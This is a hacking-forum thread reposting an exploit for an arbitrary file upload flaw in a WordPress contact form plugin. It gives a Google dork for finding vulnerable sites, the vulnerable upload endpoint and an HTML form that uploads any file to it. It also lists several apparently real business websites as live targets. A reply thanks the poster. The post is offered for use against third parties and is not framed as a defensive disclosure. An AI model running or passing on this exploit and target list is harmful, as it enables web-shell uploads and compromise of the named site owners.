WordPress Plugins console contact form - Arbitrary File Upload (1 Viewer)

Joined
Jan 19, 2017
Credits
0
Rating - 0%
# Exploit Title: WordPress Plugins console contact form - Arbitrary File Upload
# Google Dork: inurl:wp-content/plugins/console_contact_form/
# Date:2017-06-06
# Exploit Author: sohaip-hackerDZ
# Tested on:linux mint

# 1. search dork for google
# 2. Exploit the websites
# https://localhost//wp-content/plugins/console_contact_form/upload_file.php?files
# [+] if MSG :
# {"files":[]}

# 4. PoC :
=====================================================================================
HTML:
<form method="POST" action="hhtp://127.0.0.1/wp-content/plugins/console_contact_form/upload_file.php?files" enctype="multipart/form-data">
<input type="file" name="files[]" />
<button>Upload!</button><br/>
</form>

====================================================================================================
[+] dimo :
================================================================
https://www.fxwebstudio.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
https://www.tuza.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.physioandbeyond.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
http://www.theplumbingeffect.com.au/wp-content/plugins/console_contact_form/upload_file.php?files
hhtp://www.cld9.ph/wp-content/plugins/console_contact_form/upload_file.php?files
http://https://www.hellolocalmedia....ns/console_contact_form/upload_file.php?files
=========================================================================================
Great : sohaip-hackerDZ :: spyhackerz.com #
forum : http://www.spyhackerz.com/forum/ #
############################################
 
Last edited:

veyiez

Darkness İnfinity ░▒▓█ ℍ𝕖𝕝𝕚𝕠𝕤 █▓▒░
Joined
May 24, 2020
Credits
10,949
Rating - 0%
Eline Sağlık
 

Users who are viewing this thread

Top